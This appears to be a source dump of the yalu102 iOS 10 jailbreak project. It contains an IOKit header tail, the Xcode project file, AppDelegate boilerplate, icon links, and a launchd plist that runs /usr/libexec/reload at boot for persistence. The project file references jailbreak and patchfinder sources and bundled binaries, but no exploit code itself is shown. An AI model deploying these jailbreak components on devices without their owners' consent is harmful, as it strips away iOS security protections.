87 | // -------------- 88 | enum { 89 | kOSAsyncRef64Count = 8, 90 | kOSAsyncRef64Size = kOSAsyncRef64Count * ((int) sizeof(io_user_reference_t)) 91 | }; 92 | typedef io_user_reference_t OSAsyncReference64[kOSAsyncRef64Count]; 93 | 94 | struct OSNotificationHeader64 { 95 | mach_msg_size_t size; /* content size */ 96 | natural_t type; 97 | OSAsyncReference64 reference; 98 | 99 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 100 | unsigned char content[]; 101 | #else 102 | unsigned char content[0]; 103 | #endif 104 | }; 105 | 106 | #pragma pack(4) 107 | struct IOServiceInterestContent64 { 108 | natural_t messageType; 109 | io_user_reference_t messageArgument[1]; 110 | }; 111 | #pragma pack() 112 | // -------------- 113 | 114 | #if !KERNEL_USER32 115 | 116 | enum { 117 | kOSAsyncRefCount = 8, 118 | kOSAsyncRefSize = 32 119 | }; 120 | typedef natural_t OSAsyncReference[kOSAsyncRefCount]; 121 | 122 | struct OSNotificationHeader { 123 | mach_msg_size_t size; /* content size */ 124 | natural_t type; 125 | OSAsyncReference reference; 126 | 127 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 128 | unsigned char content[]; 129 | #else 130 | unsigned char content[0]; 131 | #endif 132 | }; 133 | 134 | #pragma pack(4) 135 | struct IOServiceInterestContent { 136 | natural_t messageType; 137 | void * messageArgument[1]; 138 | }; 139 | #pragma pack() 140 | 141 | #endif /* KERNEL_USER32 */ 142 | 143 | struct IOAsyncCompletionContent { 144 | IOReturn result; 145 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 146 | void * args[] __attribute__ ((packed)); 147 | #else 148 | void * args[0] __attribute__ ((packed)); 149 | #endif 150 | }; 151 | 152 | #ifndef __cplusplus 153 | typedef struct OSNotificationHeader OSNotificationHeader; 154 | typedef struct IOServiceInterestContent IOServiceInterestContent; 155 | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent; 156 | #endif 157 | 158 | #ifdef __cplusplus 159 | } 160 | #endif 161 | 162 | #endif /* __OS_OSMESSAGENOTIFICATION_H */ 163 | 164 | -------------------------------------------------------------------------------- /SourceCode/yalu102.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 46; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */; }; 11 | EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BA61E398E33009CA025 /* 0.reload.plist */; }; 12 | EA1A3BAD1E399006009CA025 /* reload in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BAC1E399006009CA025 /* reload */; }; 13 | EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */; }; 14 | EA9900E81E1E9F060056FEBD /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900E71E1E9F060056FEBD /* main.m */; }; 15 | EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900EA1E1E9F060056FEBD /* AppDelegate.m */; }; 16 | EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900ED1E1E9F060056FEBD /* ViewController.m */; }; 17 | EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900EF1E1E9F060056FEBD /* Main.storyboard */; }; 18 | EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */; }; 19 | EA9901041E219C210056FEBD /* offsets.c in Sources */ = {isa = PBXBuildFile; fileRef = EA9901021E219C210056FEBD /* offsets.c */; }; 20 | EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901051E219FF10056FEBD /* bootstrap.tar */; }; 21 | EA99010A1E21A04C0056FEBD /* tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901091E21A04C0056FEBD /* tar */; }; 22 | EA99010C1E21A0520056FEBD /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = EA99010B1E21A0520056FEBD /* launchctl */; }; 23 | EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = EA99010D1E21A1560056FEBD /* jailbreak.m */; }; 24 | EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901131E21A1B00056FEBD /* iokitmig64.o */; }; 25 | EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9901161E21A1D90056FEBD /* devicesupport.m */; }; 26 | EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901181E21A2180056FEBD /* IOKit.tbd */; }; 27 | /* End PBXBuildFile section */ 28 | 29 | /* Begin PBXFileReference section */ 30 | EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; 31 | EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = patchfinder64.o; sourceTree = ""; }; 32 | EA1A3BA61E398E33009CA025 /* 0.reload.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = 0.reload.plist; sourceTree = ""; }; 33 | EA1A3BAC1E399006009CA025 /* reload */ = {isa = PBXFileReference; lastKnownFileType = text.script.sh; path = reload; sourceTree = ""; }; 34 | EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 35 | EA9900E31E1E9F060056FEBD /* yalu102.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = yalu102.app; sourceTree = BUILT_PRODUCTS_DIR; }; 36 | EA9900E71E1E9F060056FEBD /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 37 | EA9900E91E1E9F060056FEBD /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 38 | EA9900EA1E1E9F060056FEBD /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 39 | EA9900EC1E1E9F060056FEBD /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 40 | EA9900ED1E1E9F060056FEBD /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 41 | EA9900F01E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 42 | EA9900F51E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 43 | EA9900F71E1E9F060056FEBD /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 44 | EA9901021E219C210056FEBD /* offsets.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = offsets.c; sourceTree = ""; }; 45 | EA9901031E219C210056FEBD /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; 46 | EA9901051E219FF10056FEBD /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = bootstrap.tar; sourceTree = ""; }; 47 | EA9901091E21A04C0056FEBD /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = tar; sourceTree = ""; }; 48 | EA99010B1E21A0520056FEBD /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = launchctl; sourceTree = ""; }; 49 | EA99010D1E21A1560056FEBD /* jailbreak.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = ""; }; 50 | EA99010F1E21A1A00056FEBD /* pte_stuff.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; }; 51 | EA9901131E21A1B00056FEBD /* iokitmig64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = iokitmig64.o; sourceTree = ""; }; 52 | EA9901151E21A1D90056FEBD /* devicesupport.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = devicesupport.h; sourceTree = ""; }; 53 | EA9901161E21A1D90056FEBD /* devicesupport.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = devicesupport.m; sourceTree = ""; }; 54 | EA9901181E21A2180056FEBD /* IOKit.tbd */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = "sourcecode.text-based-dylib-definition"; path = IOKit.tbd; sourceTree = ""; }; 55 | /* End PBXFileReference section */ 56 | 57 | /* Begin PBXFrameworksBuildPhase section */ 58 | EA9900E01E1E9F060056FEBD /* Frameworks */ = { 59 | isa = PBXFrameworksBuildPhase; 60 | buildActionMask = 2147483647; 61 | files = ( 62 | EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */, 63 | EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */, 64 | EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */, 65 | ); 66 | runOnlyForDeploymentPostprocessing = 0; 67 | }; 68 | /* End PBXFrameworksBuildPhase section */ 69 | 70 | /* Begin PBXGroup section */ 71 | EA9900DA1E1E9F060056FEBD = { 72 | isa = PBXGroup; 73 | children = ( 74 | EA9900E51E1E9F060056FEBD /* yalu102 */, 75 | EA9900E41E1E9F060056FEBD /* Products */, 76 | ); 77 | sourceTree = ""; 78 | }; 79 | EA9900E41E1E9F060056FEBD /* Products */ = { 80 | isa = PBXGroup; 81 | children = ( 82 | EA9900E31E1E9F060056FEBD /* yalu102.app */, 83 | ); 84 | name = Products; 85 | sourceTree = ""; 86 | }; 87 | EA9900E51E1E9F060056FEBD /* yalu102 */ = { 88 | isa = PBXGroup; 89 | children = ( 90 | EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, 91 | EA9901021E219C210056FEBD /* offsets.c */, 92 | EA9901031E219C210056FEBD /* offsets.h */, 93 | EA99010D1E21A1560056FEBD /* jailbreak.m */, 94 | EA9900E91E1E9F060056FEBD /* AppDelegate.h */, 95 | EA1A3BA61E398E33009CA025 /* 0.reload.plist */, 96 | EA1A3BAC1E399006009CA025 /* reload */, 97 | EA9900EA1E1E9F060056FEBD /* AppDelegate.m */, 98 | EA9900EC1E1E9F060056FEBD /* ViewController.h */, 99 | EA9900ED1E1E9F060056FEBD /* ViewController.m */, 100 | EA9900EF1E1E9F060056FEBD /* Main.storyboard */, 101 | EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */, 102 | EA9900F71E1E9F060056FEBD /* Info.plist */, 103 | EA9901051E219FF10056FEBD /* bootstrap.tar */, 104 | EA9901091E21A04C0056FEBD /* tar */, 105 | EA99010B1E21A0520056FEBD /* launchctl */, 106 | EA9901131E21A1B00056FEBD /* iokitmig64.o */, 107 | EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */, 108 | EA99010F1E21A1A00056FEBD /* pte_stuff.h */, 109 | EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */, 110 | EA9901181E21A2180056FEBD /* IOKit.tbd */, 111 | EA9901151E21A1D90056FEBD /* devicesupport.h */, 112 | EA9901161E21A1D90056FEBD /* devicesupport.m */, 113 | EA9900E61E1E9F060056FEBD /* Supporting Files */, 114 | ); 115 | path = yalu102; 116 | sourceTree = ""; 117 | }; 118 | EA9900E61E1E9F060056FEBD /* Supporting Files */ = { 119 | isa = PBXGroup; 120 | children = ( 121 | EA9900E71E1E9F060056FEBD /* main.m */, 122 | ); 123 | name = "Supporting Files"; 124 | sourceTree = ""; 125 | }; 126 | /* End PBXGroup section */ 127 | 128 | /* Begin PBXNativeTarget section */ 129 | EA9900E21E1E9F060056FEBD /* yalu102 */ = { 130 | isa = PBXNativeTarget; 131 | buildConfigurationList = EA9900FA1E1E9F060056FEBD /* Build configuration list for PBXNativeTarget "yalu102" */; 132 | buildPhases = ( 133 | EA9900DF1E1E9F060056FEBD /* Sources */, 134 | EA9900E01E1E9F060056FEBD /* Frameworks */, 135 | EA9900E11E1E9F060056FEBD /* Resources */, 136 | ); 137 | buildRules = ( 138 | ); 139 | dependencies = ( 140 | ); 141 | name = yalu102; 142 | productName = yalu102; 143 | productReference = EA9900E31E1E9F060056FEBD /* yalu102.app */; 144 | productType = "com.apple.product-type.application"; 145 | }; 146 | /* End PBXNativeTarget section */ 147 | 148 | /* Begin PBXProject section */ 149 | EA9900DB1E1E9F060056FEBD /* Project object */ = { 150 | isa = PBXProject; 151 | attributes = { 152 | LastUpgradeCheck = 0820; 153 | ORGANIZATIONNAME = kimjongcracks; 154 | TargetAttributes = { 155 | EA9900E21E1E9F060056FEBD = { 156 | CreatedOnToolsVersion = 8.2.1; 157 | DevelopmentTeam = 6SF652BXT8; 158 | ProvisioningStyle = Automatic; 159 | }; 160 | }; 161 | }; 162 | buildConfigurationList = EA9900DE1E1E9F060056FEBD /* Build configuration list for PBXProject "yalu102" */; 163 | compatibilityVersion = "Xcode 3.2"; 164 | developmentRegion = English; 165 | hasScannedForEncodings = 0; 166 | knownRegions = ( 167 | en, 168 | Base, 169 | ); 170 | mainGroup = EA9900DA1E1E9F060056FEBD; 171 | productRefGroup = EA9900E41E1E9F060056FEBD /* Products */; 172 | projectDirPath = ""; 173 | projectRoot = ""; 174 | targets = ( 175 | EA9900E21E1E9F060056FEBD /* yalu102 */, 176 | ); 177 | }; 178 | /* End PBXProject section */ 179 | 180 | /* Begin PBXResourcesBuildPhase section */ 181 | EA9900E11E1E9F060056FEBD /* Resources */ = { 182 | isa = PBXResourcesBuildPhase; 183 | buildActionMask = 2147483647; 184 | files = ( 185 | EA99010A1E21A04C0056FEBD /* tar in Resources */, 186 | EA99010C1E21A0520056FEBD /* launchctl in Resources */, 187 | EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */, 188 | EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */, 189 | EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */, 190 | EA1A3BAD1E399006009CA025 /* reload in Resources */, 191 | EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */, 192 | EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */, 193 | ); 194 | runOnlyForDeploymentPostprocessing = 0; 195 | }; 196 | /* End PBXResourcesBuildPhase section */ 197 | 198 | /* Begin PBXSourcesBuildPhase section */ 199 | EA9900DF1E1E9F060056FEBD /* Sources */ = { 200 | isa = PBXSourcesBuildPhase; 201 | buildActionMask = 2147483647; 202 | files = ( 203 | EA9901041E219C210056FEBD /* offsets.c in Sources */, 204 | EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */, 205 | EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */, 206 | EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */, 207 | EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */, 208 | EA9900E81E1E9F060056FEBD /* main.m in Sources */, 209 | ); 210 | runOnlyForDeploymentPostprocessing = 0; 211 | }; 212 | /* End PBXSourcesBuildPhase section */ 213 | 214 | /* Begin PBXVariantGroup section */ 215 | EA9900EF1E1E9F060056FEBD /* Main.storyboard */ = { 216 | isa = PBXVariantGroup; 217 | children = ( 218 | EA9900F01E1E9F060056FEBD /* Base */, 219 | ); 220 | name = Main.storyboard; 221 | sourceTree = ""; 222 | }; 223 | EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */ = { 224 | isa = PBXVariantGroup; 225 | children = ( 226 | EA9900F51E1E9F060056FEBD /* Base */, 227 | ); 228 | name = LaunchScreen.storyboard; 229 | sourceTree = ""; 230 | }; 231 | /* End PBXVariantGroup section */ 232 | 233 | /* Begin XCBuildConfiguration section */ 234 | EA9900F81E1E9F060056FEBD /* Debug */ = { 235 | isa = XCBuildConfiguration; 236 | buildSettings = { 237 | ALWAYS_SEARCH_USER_PATHS = NO; 238 | ARCHS = armv7; 239 | CLANG_ANALYZER_NONNULL = YES; 240 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++0x"; 241 | CLANG_CXX_LIBRARY = "libc++"; 242 | CLANG_ENABLE_MODULES = YES; 243 | CLANG_ENABLE_OBJC_ARC = YES; 244 | CLANG_WARN_BOOL_CONVERSION = YES; 245 | CLANG_WARN_CONSTANT_CONVERSION = YES; 246 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 247 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 248 | CLANG_WARN_EMPTY_BODY = YES; 249 | CLANG_WARN_ENUM_CONVERSION = YES; 250 | CLANG_WARN_INFINITE_RECURSION = YES; 251 | CLANG_WARN_INT_CONVERSION = YES; 252 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 253 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 254 | CLANG_WARN_UNREACHABLE_CODE = YES; 255 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 256 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 257 | COPY_PHASE_STRIP = NO; 258 | DEBUG_INFORMATION_FORMAT = dwarf; 259 | ENABLE_BITCODE = NO; 260 | ENABLE_STRICT_OBJC_MSGSEND = YES; 261 | ENABLE_TESTABILITY = YES; 262 | GCC_C_LANGUAGE_STANDARD = gnu99; 263 | GCC_DYNAMIC_NO_PIC = NO; 264 | GCC_NO_COMMON_BLOCKS = YES; 265 | GCC_OPTIMIZATION_LEVEL = 0; 266 | GCC_PREPROCESSOR_DEFINITIONS = ( 267 | "DEBUG=1", 268 | "$(inherited)", 269 | ); 270 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 271 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 272 | GCC_WARN_UNDECLARED_SELECTOR = YES; 273 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 274 | GCC_WARN_UNUSED_FUNCTION = YES; 275 | GCC_WARN_UNUSED_VARIABLE = YES; 276 | IPHONEOS_DEPLOYMENT_TARGET = 10.0; 277 | LD_NO_PIE = YES; 278 | MTL_ENABLE_DEBUG_INFO = YES; 279 | ONLY_ACTIVE_ARCH = YES; 280 | SDKROOT = iphoneos; 281 | TARGETED_DEVICE_FAMILY = "1,2"; 282 | }; 283 | name = Debug; 284 | }; 285 | EA9900F91E1E9F060056FEBD /* Release */ = { 286 | isa = XCBuildConfiguration; 287 | buildSettings = { 288 | ALWAYS_SEARCH_USER_PATHS = NO; 289 | ARCHS = armv7; 290 | CLANG_ANALYZER_NONNULL = YES; 291 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++0x"; 292 | CLANG_CXX_LIBRARY = "libc++"; 293 | CLANG_ENABLE_MODULES = YES; 294 | CLANG_ENABLE_OBJC_ARC = YES; 295 | CLANG_WARN_BOOL_CONVERSION = YES; 296 | CLANG_WARN_CONSTANT_CONVERSION = YES; 297 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 298 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 299 | CLANG_WARN_EMPTY_BODY = YES; 300 | CLANG_WARN_ENUM_CONVERSION = YES; 301 | CLANG_WARN_INFINITE_RECURSION = YES; 302 | CLANG_WARN_INT_CONVERSION = YES; 303 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 304 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 305 | CLANG_WARN_UNREACHABLE_CODE = YES; 306 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 307 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 308 | COPY_PHASE_STRIP = NO; 309 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 310 | ENABLE_BITCODE = NO; 311 | ENABLE_NS_ASSERTIONS = NO; 312 | ENABLE_STRICT_OBJC_MSGSEND = YES; 313 | GCC_C_LANGUAGE_STANDARD = gnu99; 314 | GCC_NO_COMMON_BLOCKS = YES; 315 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 316 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 317 | GCC_WARN_UNDECLARED_SELECTOR = YES; 318 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 319 | GCC_WARN_UNUSED_FUNCTION = YES; 320 | GCC_WARN_UNUSED_VARIABLE = YES; 321 | IPHONEOS_DEPLOYMENT_TARGET = 10.0; 322 | LD_NO_PIE = YES; 323 | MTL_ENABLE_DEBUG_INFO = NO; 324 | SDKROOT = iphoneos; 325 | TARGETED_DEVICE_FAMILY = "1,2"; 326 | VALIDATE_PRODUCT = YES; 327 | }; 328 | name = Release; 329 | }; 330 | EA9900FB1E1E9F060056FEBD /* Debug */ = { 331 | isa = XCBuildConfiguration; 332 | buildSettings = { 333 | ARCHS = armv7; 334 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 335 | CLANG_ENABLE_OBJC_ARC = NO; 336 | DEVELOPMENT_TEAM = 6SF652BXT8; 337 | INFOPLIST_FILE = yalu102/Info.plist; 338 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 339 | LIBRARY_SEARCH_PATHS = ( 340 | "$(inherited)", 341 | "$(PROJECT_DIR)/yalu102", 342 | ); 343 | PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; 344 | PRODUCT_NAME = "$(TARGET_NAME)"; 345 | USER_HEADER_SEARCH_PATHS = "$(PROJECT_DIR)/Headers"; 346 | VALID_ARCHS = armv7; 347 | }; 348 | name = Debug; 349 | }; 350 | EA9900FC1E1E9F060056FEBD /* Release */ = { 351 | isa = XCBuildConfiguration; 352 | buildSettings = { 353 | ARCHS = armv7; 354 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 355 | CLANG_ENABLE_OBJC_ARC = NO; 356 | DEVELOPMENT_TEAM = 6SF652BXT8; 357 | INFOPLIST_FILE = yalu102/Info.plist; 358 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 359 | LIBRARY_SEARCH_PATHS = ( 360 | "$(inherited)", 361 | "$(PROJECT_DIR)/yalu102", 362 | ); 363 | PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; 364 | PRODUCT_NAME = "$(TARGET_NAME)"; 365 | USER_HEADER_SEARCH_PATHS = "$(PROJECT_DIR)/Headers"; 366 | VALID_ARCHS = armv7; 367 | }; 368 | name = Release; 369 | }; 370 | /* End XCBuildConfiguration section */ 371 | 372 | /* Begin XCConfigurationList section */ 373 | EA9900DE1E1E9F060056FEBD /* Build configuration list for PBXProject "yalu102" */ = { 374 | isa = XCConfigurationList; 375 | buildConfigurations = ( 376 | EA9900F81E1E9F060056FEBD /* Debug */, 377 | EA9900F91E1E9F060056FEBD /* Release */, 378 | ); 379 | defaultConfigurationIsVisible = 0; 380 | defaultConfigurationName = Release; 381 | }; 382 | EA9900FA1E1E9F060056FEBD /* Build configuration list for PBXNativeTarget "yalu102" */ = { 383 | isa = XCConfigurationList; 384 | buildConfigurations = ( 385 | EA9900FB1E1E9F060056FEBD /* Debug */, 386 | EA9900FC1E1E9F060056FEBD /* Release */, 387 | ); 388 | defaultConfigurationIsVisible = 0; 389 | defaultConfigurationName = Release; 390 | }; 391 | /* End XCConfigurationList section */ 392 | }; 393 | rootObject = EA9900DB1E1E9F060056FEBD /* Project object */; 394 | } 395 | -------------------------------------------------------------------------------- /SourceCode/yalu102.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /SourceCode/yalu102/0.reload.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | 0.reload 7 | ProgramArguments 8 | 9 | /usr/libexec/reload 10 | 11 | RunAtLoad 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /SourceCode/yalu102/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /SourceCode/yalu102/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | 18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 19 | // Override point for customization after application launch. 20 | return YES; 21 | } 22 | 23 | 24 | - (void)applicationWillResignActive:(UIApplication *)application { 25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 27 | } 28 | 29 | 30 | - (void)applicationDidEnterBackground:(UIApplication *)application { 31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 33 | } 34 | 35 | 36 | - (void)applicationWillEnterForeground:(UIApplication *)application { 37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 38 | } 39 | 40 | 41 | - (void)applicationDidBecomeActive:(UIApplication *)application { 42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 43 | } 44 | 45 | 46 | - (void)applicationWillTerminate:(UIApplication *)application { 47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 48 | } 49 | 50 | 51 | @end 52 | -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad-1.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadnotif.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadnotif.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl-1.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl3.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptlsmal.png: -------------------------------------------------------------------------------- 